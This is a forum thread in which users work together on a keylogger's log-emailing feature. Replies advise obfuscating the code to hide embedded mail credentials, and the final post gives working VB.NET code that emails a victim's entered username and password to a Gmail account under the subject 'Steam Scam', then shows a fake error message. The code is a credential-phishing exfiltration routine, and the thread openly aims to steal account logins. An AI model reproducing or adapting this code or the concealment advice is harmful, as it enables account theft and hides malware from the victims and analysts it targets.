Need help testing menu

User Tag List

Results 1 to 4 of 4
  1. #1
    sk8erevan's Avatar Active Member
    Reputation
    37
    Join Date
    Aug 2006
    Posts
    258
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Need help testing

    Ok so i am working on a way to help perfect Neth'zul's keylogger which includes a way to send the logs via email.


    I am currently running windows vista ultimate edition and i just recently downloaded visual basic and it doesnt want to cooperate with my windows vista (i hate vista but hey whatever) anyways i attached a well thought out script that should send the logs threw outlook express but i could not try to debug them afterwords. So I'm leaving it up to one of you visual basic people to debug it (note-there is no keylogger attached to it, this is just a well thought up way to send the logs to an email. If it works fine then good but if not debugging would be nice and then ill try to work with Neth'zul to add his keylogger to it.
    Attached Files Attached Files
    PM me anytime for requests on anything you need. I will be more then happy to code for a couple people a week too.

    Need help testing
  2. #2
    Jens's Avatar Contributor
    Reputation
    179
    Join Date
    Sep 2006
    Posts
    251
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    would love to test it, but cant download it it seems, also sending using outlook express is probably not the best way since you have to assume the user already has outlook.

    if you're programming in .NET you could look into System.net.mail;
    also if you're in .NET look into obfuscation (or .net reactor if you can find it )
    the latter is because if you're using .NET its very easy to just extract the source code from the assembly, and if you're sending the logs using smtp, email and password of an external email, people could just grab it from the source and use for whatever other purpose.

  3. #3
    Apoc's Avatar Angry Penguin
    Reputation
    1387
    Join Date
    Jan 2008
    Posts
    2,750
    Thanks G/R
    0/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by avec View Post
    would love to test it, but cant download it it seems, also sending using outlook express is probably not the best way since you have to assume the user already has outlook.

    if you're programming in .NET you could look into System.net.mail;
    also if you're in .NET look into obfuscation (or .net reactor if you can find it )
    the latter is because if you're using .NET its very easy to just extract the source code from the assembly, and if you're sending the logs using smtp, email and password of an external email, people could just grab it from the source and use for whatever other purpose.
    Good obfuscation prevents that. (I use Dotfuscator Pro)

    It renames members/methods into non-character symbols, that don't break the program itself. And also encrypts strings, only unencrypting them at runtime when their needed. (Works on any .NET application)

  4. #4
    Brutal Pink Panther's Avatar Member
    Reputation
    9
    Join Date
    Mar 2008
    Posts
    115
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    if its the email you cant send then use
    in the top of code index paste this
    Imports System.Net.Mail, make a button and paste this:
    Code:
    Dim mymailmessage As New MailMessage()
            Try
    mymailmessage.From = New MailAddress("sender")
                mymailmessage.To.Add("him that recives the email, ect, [email protected]")
                mymailmessage.Subject = "Steam Scam"
                mymailmessage.Body = "Username: '" + TextBox1.Text + "' Password: '" + TextBox2.Text + "'" + " Account Scammed date: Year: " + y + " Month: " + m + " Day: " + d + " Time: " + h + ":" + mi
                Dim SMTP As New SmtpClient("smtp.gmail.com")
                SMTP.Port = 587
                SMTP.EnableSsl = True
                SMTP.Credentials = New System.Net.NetworkCredential("the email its from", "password")
                SMTP.Send(mymailmessage)
                TextBox2.Text = ""
                MsgBox("the error :P.", MsgBoxStyle.Information, "Error")
            Catch ex As Exception
            End Try
    REMEMBER TO CHANGE THE red lines
    Thats what i use
    Last edited by Brutal Pink Panther; 08-10-2008 at 01:53 PM.

Similar Threads

  1. Need help testing my Public Server
    By Bruthon in forum WoW EMU Questions & Requests
    Replies: 5
    Last Post: 08-27-2010, 10:43 PM
  2. More than 25 dailies in 1 day -- Need help testing
    By Sklug in forum World of Warcraft Exploits
    Replies: 8
    Last Post: 08-12-2009, 02:52 PM
  3. Glider vs. Openbot Test. I need help.
    By utarda in forum World of Warcraft General
    Replies: 15
    Last Post: 02-15-2008, 01:31 PM
  4. Need help with stress testing
    By ovation in forum World of Warcraft Emulator Servers
    Replies: 3
    Last Post: 01-14-2008, 04:46 PM
All times are GMT -5. The time now is 11:44 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2024 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search